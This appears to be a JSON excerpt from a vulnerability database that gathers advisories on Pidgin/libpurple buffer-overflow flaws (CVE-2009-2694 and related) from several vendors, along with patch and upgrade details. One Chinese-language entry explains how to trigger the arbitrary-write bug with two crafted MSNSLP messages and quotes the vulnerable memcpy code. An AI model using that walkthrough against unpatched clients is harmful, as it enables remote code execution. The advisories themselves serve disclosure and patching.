"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-1870", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-02T18:37:43"}], "seebug": [{"id": "SSV:11415", "type": "seebug", "title": "Pidgin\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "description": "BUGTRAQ ID: 35067\r\nCVE(CAN) ID: CVE-2009-1376,CVE-2009-1375,CVE-2009-1374,CVE-2009-1373\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u5728\u5904\u7406\u5404\u79cd\u5373\u65f6\u6d88\u606f\u65f6\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7684\u7cfb\u7edf\u3002\r\n\r\n1) \u5904\u7406MSN SLP\u6d88\u606f\u65f6\u7684\u622a\u5c3e\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n2) XMPP SOCKS5 bytestream\u670d\u52a1\u5668\u5728\u521d\u59cb\u5316\u51fa\u7ad9\u6587\u4ef6\u4f20\u8f93\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3) PurpleCircBuffer\u7ed3\u6784\u7684\u5b9e\u73b0\u4e2d\u5b58\u5728\u8fb9\u754c\u6761\u4ef6\u9519\u8bef\uff0c\u7279\u5236\u7684XMPP\u6216Sametime\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u800c\u5d29\u6e83\u3002\r\n\r\n4) \u7279\u5236\u7684QQ\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4decrypt_out()\u51fd\u6570\u51fa\u73b08\u4e2a\u5b57\u8282\u7684\u6808\u6ea2\u51fa\u3002\r\n\n\nPidgin < 2.5.6\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1060-02\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1060-02\uff1aImportant: pidgin security update\r\n\u94fe\u63a5\uff1a<a href=\"https://www.redhat.com/support/errata/RHSA-2009-1060.html\" target=\"_blank\" rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2009-1060.html</a>", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-11415", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "lastseen": "2017-11-19T18:49:52"}, {"id": "SSV:12249", "type": "seebug", "title": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit", "description": "No description provided by source.", "published": "2009-09-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12249", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T18:37:23"}, {"id": "SSV:66870", "type": "seebug", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-66870", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T14:11:42"}, {"id": "SSV:12092", "type": "seebug", "title": "Pidgin Libpurple\u5e93msn_slplink_process_msg()\u51fd\u6570\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "description": "CVE(CAN) ID: CVE-2009-2694\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002 \r\n\r\nPidgin\u548c\u5176\u4ed6\u4e00\u4e9b\u5373\u65f6\u6d88\u606f\u5ba2\u6237\u7aef\u6240\u4f7f\u7528\u7684Libpurple\u5e93\u4e2d\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u804a\u5929\u5ba2\u6237\u7aef\u53d1\u9001\u7279\u5236\u7684MSNSLP\u62a5\u6587\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u653b\u51fb\u9700\u8981\u53d1\u9001\u4e24\u4e2a\u8fde\u7eed\u7684MSNSLP\u6d88\u606f\uff0c\u7b2c\u4e00\u4e2a\u7528\u4e8e\u5bf9slpmsg\u5b58\u50a8\u4f1a\u8bddid\uff0c\u7b2c\u4e8c\u4e2a\u7528\u4e8e\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6700\u7ec8\u76ee\u6807\u662f\u5230\u8fbemsn_slplink_process_msg()\u4e2d\u7684memcpy()\u8c03\u7528\u3002\u9700\u8981\u521b\u5efa\u504f\u79fb\u4e3a\u975e0\u7684MSNSLP\u6d88\u606f\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u503c\u662fmemcpy()\u7684\u76ee\u6807\u3002\r\n\r\n\u56e0\u4e3a\u504f\u79fb\u975e0\uff0c\u6240\u4ee5\u5728\u8c03\u7528msn_slplink_message_find()\u8fd4\u56deNULL\u65f6\u4f1a\u51fa\u73b0\u7b2c\u4e00\u4e2a\u95ee\u9898\uff1a\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n\u56e0\u6b64\uff0cslpmsg\u5fc5\u987b\u4e3a\u975e\u7a7a\uff0c\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u9700\u8981\u53d1\u9001\u4e24\u6b21\u6d88\u606f\u624d\u80fd\u8fdb\u884c\u653b\u51fb\u3002\u53d1\u9001\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u504f\u79fb\u4e3a0\uff0c\u7528\u4e8e\u521b\u5efaslpmsg\u5bf9\u8c61\uff0cLibpurple\u4f1a\u5b58\u50a8\u8fd9\u4e2a\u5bf9\u8c61\uff1b\u7b2c\u4e8c\u4e2aMSNSLP\u6d88\u606f\u7684\u504f\u79fb\u975e0\uff0c\u4f46\u7531\u4e8eLibpurple\u5df2\u7ecf\u5b58\u50a8\u4e86\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\uff0c\u56e0\u6b64\u8c03\u7528msn_slplink_message_find()\u4f1a\u6709\u6548\u7684\u8fd4\u56de\u4e4b\u524d\u7684\u5bf9\u8c61\u800c\u4e0d\u662fNULL\uff1a\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n\u4f8b\u5982\uff0c\u5982\u679c\u521b\u5efa\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u5927\u5c0f\u4e3a0x01ffffff\uff0c\u7b2c\u4e8c\u4e2a\u6d88\u606f\u7684\u504f\u79fb\u4e3a\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u503c\uff0c\u5c31\u6ee1\u8db3\u4e86\u4efb\u610f\u5199\u5165\u7684\u6761\u4ef6\u3002\r\n\r\n\u6700\u540e\uff0c\u4ee5\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u504f\u79fb\u503c\u5230\u8fbe\u4e86memcpy()\uff0c\u7f13\u51b2\u533a\u6307\u54110\u3002\u8fd9\u610f\u5473\u7740\u53ef\u4ee5\u5411\u4f4e\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u4f4d\u7f6e\u5199\u5165\u6570\u636e\u5185\u5bb9\u3002\n\nRob Flynn Gaim >= 0.79\r\nPidgin Pidgin 2.5.8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1218-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1218-01\uff1aCritical: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2009-1218.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.pidgin.im/news/security/?id=34", "published": "2009-08-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12092", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T21:19:36"}], "gentoo": [{"id": "GLSA-200910-02", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "description": "### Background\n\nPidgin is a client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities were found in Pidgin: \n\n * Yuriy Kaminskiy reported that the OSCAR protocol implementation in Pidgin misinterprets the ICQWebMessage message type as the ICQSMS message type, triggering an allocation of a large amount of memory (CVE-2009-1889).\n * Federico Muttis of Core Security Technologies reported that the msn_slplink_process_msg() function in libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin doesn't properly process incoming SLP messages, triggering an overwrite of an arbitrary memory location (CVE-2009-2694). NOTE: This issue reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA 200905-07).\n * bugdave reported that protocols/jabber/auth.c in libpurple as used in Pidgin does not follow the \"require TSL/SSL\" preference when connecting to older Jabber servers that do not follow the XMPP specification, resulting in a connection to the server without the expected encryption (CVE-2009-3026).\n\n### Impact\n\nA remote attacker could send specially crafted SLP (via MSN) or ICQ web messages, possibly leading to execution of arbitrary code with the privileges of the user running Pidgin, unauthorized information disclosure, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.9-r1\"", "published": "2009-10-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200910-02", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "lastseen": "2016-09-06T19:46:39"}, {"id": "GLSA-200905-07", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "description": "### Background\n\nPidgin (formerly Gaim) is an instant messaging client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin: \n\n * Veracode reported a boundary error in the \"XMPP SOCKS5 bytestream server\" when initiating an outgoing file transfer (CVE-2009-1373).\n * Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol handler (CVE-2009-1374).\n * A memory corruption flaw in \"PurpleCircBuffer\" was disclosed by Josef Andrysek (CVE-2009-1375).\n * The previous fix for CVE-2008-2927 contains a cast from uint64 to size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA 200901-13).\n\n### Impact\n\nA remote attacker could send specially crafted messages or files using the MSN, XMPP or QQ protocols, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. NOTE: Successful exploitation might require the victim's interaction. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.6\"", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200905-07", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-06T19:46:03"}], "freebsd": [{"id": "B1CA65E6-5AAF-11DE-BC9B-0030843D3802", "type": "freebsd", "title": "pidgin -- multiple vulnerabilities", "description": "\nSecunia reports:\n\nSome vulnerabilities and weaknesses have been reported in Pidgin,\n\t which can be exploited by malicious people to cause a DoS or to\n\t potentially compromise a user's system.\nA truncation error in the processing of MSN SLP messages can be\n\t exploited to cause a buffer overflow.\nA boundary error in the XMPP SOCKS5 \"bytestream\" server when\n\t initiating an outgoing file transfer can be exploited to cause a\n\t buffer overflow.\nA boundary error exists in the implementation of the\n\t \"PurpleCircBuffer\" structure. This can be exploited to corrupt memory\n\t and cause a crash via specially crafted XMPP or Sametime\n\t packets.\nA boundary error in the \"decrypt_out()\" function can be exploited\n\t to cause a stack-based buffer overflow with 8 bytes and crash the\n\t application via a specially crafted QQ packet.\n\n", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/b1ca65e6-5aaf-11de-bc9b-0030843d3802.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-26T17:24:52"}, {"id": "59E7AF2D-8DB7-11DE-883B-001E3300A30D", "type": "freebsd", "title": "pidgin -- MSN overflow parsing SLP messages", "description": "\nSecunia reports:\n\nA vulnerability has been reported in Pidgin, which can be\n\t exploited by malicious people to potentially compromise a user's\n\t system.\nThe vulnerability is caused due to an error in the\n\t \"msn_slplink_process_msg()\" function when processing MSN SLP\n\t messages and can be exploited to corrupt memory.\nSuccessful exploitation may allow execution of arbitrary\n\t code.\nThe vulnerability is reported in versions 2.5.8 and prior.\n\t Other versions may also be affected.\n\n", "published": "2009-08-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-26T17:24:51"}], "slackware": [{"id": "SSA-2009-146-01", "type": "slackware", "title": "pidgin", "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.6-i486-1_slack12.2.txz: Upgraded to pidgin-2.5.6.\n This version fixes security issues that could lead to a denial of service or\n the execution of arbitrary code as the user running Pidgin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.6-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n8890772717a70b042f5c76ae4e4ab6b0 pidgin-2.5.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n3d7e918ff1d3eef13107472f313978a4 pidgin-2.5.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n144a78d203391bd7af7aac36d53061f3 pidgin-2.5.6-i486-1_slack12.2.tgz\n\nSlackware -current package:\n0b2aa951d3f6b9f8d5a9ac7e8d28c7a6 pidgin-2.5.6-i486-1.txz\n\nSlackware64 -current package:\ne79c2f0466d4714951a7f53f04740695 pidgin-2.5.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.6-i486-1_slack12.2.tgz", "published": "2009-05-26T19:19:48", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.435503", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2018-02-02T18:11:29"}, {"id": "SSA-2009-231-02", "type": "slackware", "title": "pidgin", "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz:\n This update fixes a bug in Pidgin's MSN protocol implementation that can\n allow a remote attacker to send a malicious MSN message to a Pidgin user,\n which will possibly cause arbitrary code to be executed as that user.\n This issue was discovered by Federico Muttis of Core Security Technologies.\n For more information, see:\n http://www.coresecurity.com/content/libpurple-arbitrary-write\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.9-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n3ce9ef2fb489919027f5fd48aecfe16e pidgin-2.5.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nab5b36db9e7f97b845672d030b64b999 pidgin-2.5.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nbefadfc8dde193789bcee91f7f33f8ba pidgin-2.5.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\n4bc5945ad08e4fa5ebefcd1c5fc9c932 pidgin-2.5.9-i486-1.txz\n\nSlackware64 -current package:\n0a18668ccb5cd223e56789c871997769 pidgin-2.5.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.9-i486-1_slack12.2.tgz", "published": "2009-08-19T18:56:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.423964", "cvelist": ["CVE-2009-2694"], "lastseen": "2018-02-02T18:11:30"}], "cert": [{"id": "VU:582244", "type": "cert", "title": "Libpurple buffer overflow vulnerability", "description": "### Overview\n\nThe Libpurple instant messenger library contains a vulnerability that may allow an attacker to execute arbitrary code.\n\n### Description\n\n[Libpurple](<http://developer.pidgin.im/wiki/WhatIsLibpurple>) is an instant messenger (IM) library that is used by various programs to connect to multiple networks. Libpurple contains a buffer overflow vulnerability that can be triggered by sending specially crafted [MSNSLP](<http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>) messages to a program that is using an affected version of the library. \n\nFor more technical details, see CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>). \n \n--- \n \n### Impact\n\nAn attacker may be able to execute arbitrary code or cause an IM program to crash. \n \n--- \n \n### Solution\n\n**Upgrade** \nInstant messenger programs may distribute Libpurple and will provide an updated version to their users as a security update. See the systems affected portion of this document for a partial list of affected IM clients. Users who compile Libpurple or IM programs should see the Libpurple [site](<http://developer.pidgin.im/>) or their operating system vendor for updated software. \n \n--- \n \n \n**Restrict Access** \n \nThe most likely attack vector for this issue would be via the MSN IM network. Administrators may be able to temporarily mitigate this issue by blocking access to the MSN IM network. This workaround is not likely to be totally effective. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nPidgin| | -| 21 Aug 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23582244 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://pidgin.im/news/security/?id=34>\n * <http://developer.pidgin.im/wiki/WhatIsLibpurple>\n * <http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>\n * <http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>\n * <http://supportwiki.cisco.com/ViewWiki/index.php/How_to_configure_the_PIX_500_Series_Firewall_with_software_version_6.x_in_order_to_block_the_MSN_messenger_with_the_access-list_command>\n\n### Credit\n\nInformation from CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>) was used in this report. \n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-2694](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694>)\n * Date Public: 18 Aug 2009\n * Date First Published: 21 Aug 2009\n * Date Last Updated: 21 Aug 2009\n * Severity Metric: 10.19\n * Document Revision: 12\n\n", "published": "2009-08-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/582244", "cvelist": ["CVE-2009-2694", "CVE-2009-2694"], "lastseen": "2016-02-03T09:12:06"}], "packetstorm": [{"id": "PACKETSTORM:81096", "type": "packetstorm", "title": "Pidgin MSN 2.5.8 Code Execution", "description": "", "published": "2009-09-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/81096/Pidgin-MSN-2.5.8-Code-Execution.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-12-05T22:15:13"}]}}